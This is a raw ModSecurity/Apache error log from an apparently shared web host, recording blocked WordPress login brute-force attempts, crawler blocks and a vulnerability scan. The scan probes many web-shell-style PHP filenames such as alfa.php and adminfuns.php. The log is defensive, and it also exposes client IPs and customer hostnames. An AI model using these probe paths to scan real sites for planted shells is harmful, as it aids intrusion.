[Tue May 26 19:25:22.343820 2026] [security2:error] [pid 49598:tid 49677] [remote 74.91.224.220:54628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmSuzJzkdc0WtdrwtF_AABBE4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:25:22.977756 2026] [security2:error] [pid 49598:tid 49745] [client 66.146.239.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmSuzJzkdc0WtdrwtGDwAAAJY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157054&moderation-hash=1470d6af7a4ecaf9053cee58ccfa4276
[Tue May 26 19:25:23.391801 2026] [security2:error] [pid 49598:tid 49842] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmSuzJzkdc0WtdrwtGEwAAAPc"]
[Tue May 26 19:25:25.772586 2026] [security2:error] [pid 49598:tid 49693] [remote 45.79.189.31:29944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWmTezJzkdc0WtdrwtGZAAAil4"]
[Tue May 26 19:25:26.049671 2026] [security2:error] [pid 49598:tid 49851] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmTezJzkdc0WtdrwtGYAAAAQA"]
[Tue May 26 19:25:27.804386 2026] [security2:error] [pid 49598:tid 49802] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmT-zJzkdc0WtdrwtGnQAAAM8"]
[Tue May 26 19:25:29.731000 2026] [security2:error] [pid 49598:tid 49703] [remote 14.161.17.36:49612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmUezJzkdc0WtdrwtG4wAA0Gg"]
[Tue May 26 19:25:29.734565 2026] [security2:error] [pid 49598:tid 49707] [remote 74.7.241.58:55298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWmUezJzkdc0WtdrwtG8AAAj2w"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/woocommerce/templates/cart
[Tue May 26 19:25:29.924871 2026] [security2:error] [pid 49598:tid 49757] [client 123.20.69.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmUezJzkdc0WtdrwtG4gAAAKI"]
[Tue May 26 19:25:30.166582 2026] [security2:error] [pid 49598:tid 49832] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmUezJzkdc0WtdrwtG7wAAAO0"]
[Tue May 26 19:25:31.081158 2026] [security2:error] [pid 49598:tid 49712] [remote 178.104.164.71:38134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmUuzJzkdc0WtdrwtHEAAAqXE"]
[Tue May 26 19:25:31.456953 2026] [security2:error] [pid 49598:tid 49599] [remote 216.73.216.30:47980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmU-zJzkdc0WtdrwtHHQAA8QA"]
[Tue May 26 19:25:32.455184 2026] [security2:error] [pid 49598:tid 49740] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmVOzJzkdc0WtdrwtHLAAAAJE"]
[Tue May 26 19:25:35.232484 2026] [security2:error] [pid 49598:tid 49795] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmVuzJzkdc0WtdrwtHbwAAAMg"]
[Tue May 26 19:25:36.457659 2026] [security2:error] [pid 49598:tid 49606] [remote 216.73.216.30:47980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmWOzJzkdc0WtdrwtHowAAzgc"]
[Tue May 26 19:25:37.425314 2026] [security2:error] [pid 49598:tid 49757] [client 20.192.3.167:12705] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "christinaspromotions.com"] [uri "/1.php"] [unique_id "ahWmWezJzkdc0WtdrwtHvwAAAKI"]
[Tue May 26 19:25:37.495777 2026] [security2:error] [pid 49598:tid 49757] [client 20.192.3.167:12705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/1.php"] [unique_id "ahWmWezJzkdc0WtdrwtHvwAAAKI"]
[Tue May 26 19:25:37.502210 2026] [security2:error] [pid 49598:tid 49841] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmWezJzkdc0WtdrwtHtQAAAPY"]
[Tue May 26 19:25:38.567908 2026] [security2:error] [pid 49598:tid 49767] [client 20.192.3.167:6318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/2.php"] [unique_id "ahWmWuzJzkdc0WtdrwtH3gAAAKw"]
[Tue May 26 19:25:39.602879 2026] [security2:error] [pid 49598:tid 49841] [client 20.192.3.167:7880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/7.php"] [unique_id "ahWmW-zJzkdc0WtdrwtIAwAAAPY"]
[Tue May 26 19:25:39.744283 2026] [security2:error] [pid 49598:tid 49759] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmW-zJzkdc0WtdrwtH-QAAAKQ"]
[Tue May 26 19:25:40.273788 2026] [security2:error] [pid 49598:tid 49725] [remote 47.128.127.77:12864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/category/spirit-in-focus/vodka/"] [unique_id "ahWmXOzJzkdc0WtdrwtIFwAA2n4"]
[Tue May 26 19:25:40.610020 2026] [security2:error] [pid 49598:tid 49764] [client 20.192.3.167:5642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/10.php"] [unique_id "ahWmXOzJzkdc0WtdrwtIJQAAAKk"]
[Tue May 26 19:25:41.409836 2026] [security2:error] [pid 49598:tid 49792] [client 85.208.96.211:63212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-camp-week/day/2022-10-17/"] [unique_id "ahWmXezJzkdc0WtdrwtIQgAAAMU"]
[Tue May 26 19:25:41.410017 2026] [security2:error] [pid 49598:tid 49792] [client 85.208.96.211:63212] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-camp-week/day/2022-10-17/"] [unique_id "ahWmXezJzkdc0WtdrwtIQgAAAMU"]
[Tue May 26 19:25:41.605239 2026] [security2:error] [pid 49598:tid 49798] [client 20.192.3.167:9671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/13.php"] [unique_id "ahWmXezJzkdc0WtdrwtISQAAAMs"]
[Tue May 26 19:25:41.744075 2026] [security2:error] [pid 49598:tid 49628] [remote 216.73.216.30:29104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmXezJzkdc0WtdrwtIVgAAhh0"]
[Tue May 26 19:25:42.081630 2026] [security2:error] [pid 49598:tid 49773] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmXezJzkdc0WtdrwtITAAAALI"]
[Tue May 26 19:25:42.572611 2026] [security2:error] [pid 49598:tid 49785] [client 20.192.3.167:7802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/100.php"] [unique_id "ahWmXuzJzkdc0WtdrwtIdAAAAL4"]
[Tue May 26 19:25:42.945280 2026] [security2:error] [pid 49598:tid 49728] [client 14.171.241.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWmXezJzkdc0WtdrwtIWgAAAIU"]
[Tue May 26 19:25:43.108399 2026] [security2:error] [pid 49598:tid 49622] [remote 217.174.149.47:49266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.149.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWmXuzJzkdc0WtdrwtIeAAAlRc"]
[Tue May 26 19:25:43.556117 2026] [security2:error] [pid 49598:tid 49756] [client 20.192.3.167:12523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/222.php"] [unique_id "ahWmX-zJzkdc0WtdrwtIkwAAAKE"]
[Tue May 26 19:25:44.000699 2026] [security2:error] [pid 49598:tid 49627] [remote 162.214.206.32:36400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWmX-zJzkdc0WtdrwtImgAAqBw"]
[Tue May 26 19:25:44.187966 2026] [security2:error] [pid 49598:tid 49630] [remote 162.214.206.32:36400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWmYOzJzkdc0WtdrwtIowAA2x8"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:25:44.257283 2026] [security2:error] [pid 49598:tid 49639] [remote 217.174.149.47:49266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.149.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWmYOzJzkdc0WtdrwtIqgAA-Sg"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:25:44.495286 2026] [security2:error] [pid 49598:tid 49636] [remote 154.26.132.116:39056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmYOzJzkdc0WtdrwtIsQAAuCU"]
[Tue May 26 19:25:44.622486 2026] [security2:error] [pid 49598:tid 49789] [client 20.192.3.167:4523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/adminfuns.php"] [unique_id "ahWmYOzJzkdc0WtdrwtIvwAAAMI"]
[Tue May 26 19:25:44.719930 2026] [security2:error] [pid 49598:tid 49741] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmYOzJzkdc0WtdrwtIrQAAAJI"]
[Tue May 26 19:25:45.178754 2026] [security2:error] [pid 49598:tid 49637] [remote 222.165.190.235:38428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWmYOzJzkdc0WtdrwtIygAA-yY"]
[Tue May 26 19:25:45.627582 2026] [security2:error] [pid 49598:tid 49793] [client 20.192.3.167:4505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/abcd.php"] [unique_id "ahWmYezJzkdc0WtdrwtI4wAAAMY"]
[Tue May 26 19:25:45.648322 2026] [security2:error] [pid 49598:tid 49641] [remote 222.165.190.235:38428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWmYezJzkdc0WtdrwtI4QAA2yo"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 19:25:46.413163 2026] [security2:error] [pid 49598:tid 49772] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmYuzJzkdc0WtdrwtI9AAAALE"]
[Tue May 26 19:25:46.468973 2026] [security2:error] [pid 49598:tid 49610] [remote 216.73.216.30:29104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmYuzJzkdc0WtdrwtI_wAAwws"]
[Tue May 26 19:25:46.630086 2026] [security2:error] [pid 49598:tid 49796] [client 20.192.3.167:1736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/al.php"] [unique_id "ahWmYuzJzkdc0WtdrwtJBwAAAMk"]
[Tue May 26 19:25:47.577203 2026] [security2:error] [pid 49598:tid 49814] [client 20.192.3.167:7270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/alfa.php"] [unique_id "ahWmY-zJzkdc0WtdrwtJLQAAANs"]
[Tue May 26 19:25:48.705517 2026] [security2:error] [pid 49598:tid 49662] [remote 154.26.132.116:39056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmZOzJzkdc0WtdrwtJTwABAT8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:25:48.804513 2026] [security2:error] [pid 49598:tid 49827] [client 91.245.236.124:40605] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmYuzJzkdc0WtdrwtJEAAAAOg"]
[Tue May 26 19:25:48.807704 2026] [security2:error] [pid 49598:tid 49796] [client 20.192.3.167:10550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/as.php"] [unique_id "ahWmZOzJzkdc0WtdrwtJUQAAAMk"]
[Tue May 26 19:25:48.826000 2026] [security2:error] [pid 49598:tid 49728] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmZOzJzkdc0WtdrwtJQQAAAIU"]
[Tue May 26 19:25:49.714434 2026] [security2:error] [pid 49598:tid 49737] [client 91.245.236.124:37041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmZezJzkdc0WtdrwtJdQAAAI4"]
[Tue May 26 19:25:49.769768 2026] [security2:error] [pid 49598:tid 49757] [client 20.192.3.167:12675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/aa.php"] [unique_id "ahWmZezJzkdc0WtdrwtJegAAAKI"]
[Tue May 26 19:25:50.445483 2026] [security2:error] [pid 49598:tid 49763] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmZuzJzkdc0WtdrwtJiQAAAKg"]
[Tue May 26 19:25:50.700756 2026] [security2:error] [pid 49598:tid 49846] [client 20.192.3.167:10162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/abc.php"] [unique_id "ahWmZuzJzkdc0WtdrwtJnQAAAPs"]
[Tue May 26 19:25:51.719727 2026] [security2:error] [pid 49598:tid 49655] [remote 216.73.216.30:1594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmZ-zJzkdc0WtdrwtJuwAA6Dg"]
[Tue May 26 19:25:51.745315 2026] [security2:error] [pid 49598:tid 49807] [client 20.192.3.167:13612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/av.php"] [unique_id "ahWmZ-zJzkdc0WtdrwtJvQAAANQ"]
[Tue May 26 19:25:52.130982 2026] [proxy:error] [pid 49598:tid 49801] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:25:52.131043 2026] [proxy_http:error] [pid 49598:tid 49801] [client 198.235.24.35:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:25:52.131648 2026] [proxy:error] [pid 49598:tid 49801] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:25:52.131683 2026] [proxy_http:error] [pid 49598:tid 49801] [client 198.235.24.35:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:25:52.669636 2026] [security2:error] [pid 49598:tid 49755] [client 20.192.3.167:7273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/autoload_classmap.php"] [unique_id "ahWmaOzJzkdc0WtdrwtJ3wAAAKA"]
[Tue May 26 19:25:52.924709 2026] [security2:error] [pid 49598:tid 49830] [client 114.119.143.177:55855] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/portfolio/fabulous-bathmat-2"] [unique_id "ahWmaOzJzkdc0WtdrwtJ7AAAAOs"], referer: https://www.anujtradingco.com/features/isotope-grid/page/5?upage=2
[Tue May 26 19:25:53.189552 2026] [security2:error] [pid 49598:tid 49831] [client 157.22.101.115:64125] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "virgence.com"] [uri "/wp-login.php"] [unique_id "ahWmaezJzkdc0WtdrwtJ7gAAAOw"], referer: https://virgence.com/wp-login.php
[Tue May 26 19:25:53.279116 2026] [security2:error] [pid 49598:tid 49791] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmaOzJzkdc0WtdrwtJ5QAAAMQ"]
